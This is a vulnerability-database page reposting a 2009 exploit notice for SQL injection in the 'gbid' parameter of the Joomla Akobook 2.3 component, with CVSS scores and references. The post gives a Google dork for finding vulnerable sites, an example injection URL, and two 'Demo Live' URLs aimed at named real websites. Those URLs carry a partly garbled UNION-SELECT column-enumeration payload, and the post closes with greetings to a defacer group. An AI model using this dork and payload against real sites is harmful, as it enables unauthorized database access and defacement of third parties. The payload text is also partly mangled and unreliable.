Joomla Component Akobook 2.3 (gbid) SQL Injection Vulnerability

2009-07-29 / 2009-07-30
Credit: Ab1i
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Joomla Component com_akobook Vulnerability ---------------------------------------------------------------------- ################################################### [+] Author : Ab1i [+] Email : ab1i_usta@hotmail.com [+] Dork : inurl:index.php?option=com_akobook ################################################### ________________________________________________________ Example: http://localHost/path/components/index.php?option=com_akobook&Itemid=36= ( SQL code ) Demo Live (1): http://lesnyak.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birli%20+%20+1,2,3,4,5,6,7,8,9%20se&#195;in%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20* Demo Live (2): http://www.prostatitunet.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birli%20+%20+1,2,3,4,5,6,7,8,9%20se&#195;in%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20* ++++++++++++++++++++++++++++++++++++++++++++++++++ www.ayyildiz.org T&#195;&#188;rk '&#195;&#188;n T&#195;&#188;rkten bka dostu yoktur . Sizde T&#195;&#188;rk siteleri Destek olun .... Turkish Defacers Ab1i Eno7 , The_Bekir , Bgh7 , m0sted , Beygazi . Ustalara Selam olsun :) +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ <name>AkoBook</name> <creationDate>09.04.2006</creationDate> <author>Melikyan Sergey aka SaD</author> <copyright> This component is released under the GNU/GPL License. </copyright> <authorEmail>contact@saddo.ru</authorEmail> <authorUrl>http://saddo.ru/</authorUrl> <version>SE 2.3</version>

References:

http://www.securityfocus.com/bid/35268
http://www.milw0rm.com/exploits/8911


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top